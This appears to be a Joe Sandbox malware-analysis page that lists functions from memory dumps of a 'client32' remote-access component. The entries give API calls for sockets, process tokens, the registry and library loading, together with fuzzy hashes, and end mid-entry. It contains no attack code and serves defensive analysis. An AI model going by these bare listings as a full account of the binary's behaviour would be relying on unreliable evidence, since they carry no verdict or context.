Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0

Function 68598FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68598FE4
getsockname.WSOCK32(?,?,00000010,?,02B42E90,?), ref: 68599005
WSAGetLastError.WSOCK32(?,?,00000010,?,02B42E90,?), ref: 6859902E

Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_memsetgetsocknameinet_ntoa
String ID:
API String ID: 3066294524-0
Opcode ID: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
Instruction ID: b2f72d1da823fcf21a5055cfacb7210fa2dd74d042b233ef0eeefe23358ff26e
Opcode Fuzzy Hash: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
Instruction Fuzzy Hash: A4113076E00108AFCB40DFA9DC11AFFB7B8EF89214F41456AEC05E7240E770AE148B95

Function 1110E3C0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
__wsplitpath.LIBCMT ref: 1110E405
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__wsplitpath
String ID:
API String ID: 395646034-0
Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65

Function 1109DCF0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18

Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,00470EF8,?,00000001,00000001), ref: 1109DCB3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61

Function 1110C6B0 Relevance: 3.8, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111EC8B8,7E4636A2,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
EnterCriticalSection.KERNEL32(111EC8B8,7E4636A2,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91

Function 11067F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012

Strings

??CTL32.DLL, xrefs: 11067FD3

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91

Function 110267B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110267DD

Strings

?:\, xrefs: 110267D2

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791

Function 110EAED0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,7E4636A2), ref: 110EAE9D

RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,7E4636A2), ref: 110EAEEC

Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B

Strings

Error %d Opening regkey %s, xrefs: 110EAEFA

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0

Function 1110C4A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 1110C4D2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C4BC

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 4120431230-2363596943
Opcode ID: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
Opcode Fuzzy Hash: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6

Function 110EAE90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,7E4636A2), ref: 110EAE9D

Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B

Strings

Error %d closing regkey %x, xrefs: 110EAEAD

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660

Function 111429E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0224B858,?,?,?,00000100), ref: 111429F9

Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A

Strings

NSMTRACE, xrefs: 111429F4

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61

Function 68594F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78

Strings

psapi.dll, xrefs: 68594F71

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
Instruction ID: b761ed76ea0f9ce8f81cf52a1ef79c57d507c6a42b64ba97d65a0e7c60646a59
